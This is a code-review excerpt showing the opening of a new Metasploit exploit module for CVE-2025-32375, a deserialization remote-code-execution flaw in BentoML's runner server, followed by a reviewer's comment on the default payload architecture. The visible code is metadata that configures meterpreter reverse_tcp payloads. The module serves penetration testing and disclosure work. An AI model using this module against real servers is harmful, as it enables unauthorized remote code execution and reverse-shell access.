modules/exploits/linux/http/bentoml_runner_server_rce_cve_2025_32375.rb

```diff
@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "BentoML's runner server RCE",
+        'Description' => %q{
+          There was an insecure deserialization in BentoML's runner server.
+          By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server,
+          which will grant the attackers to have the initial access and information disclosure on the server.
+        },
+        'Author' => [
+          'SeaWind',          # Vulnerability discovery and PoC
+          'Takahiro Yokoyama' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-32375'],
+          ['URL', 'https://github.com/advisories/GHSA-7v4r-c989-xh26'],
+        ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Arch' => ARCH_PYTHON,
+              'Platform' => 'python',
+              'Type' => :python,
+              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                # defaults to cmd/linux/http/aarch64/meterpreter/reverse_tcp
```

Comment:
Interesting, I would have expected it to default to an x64 payload, thanks for mentioning this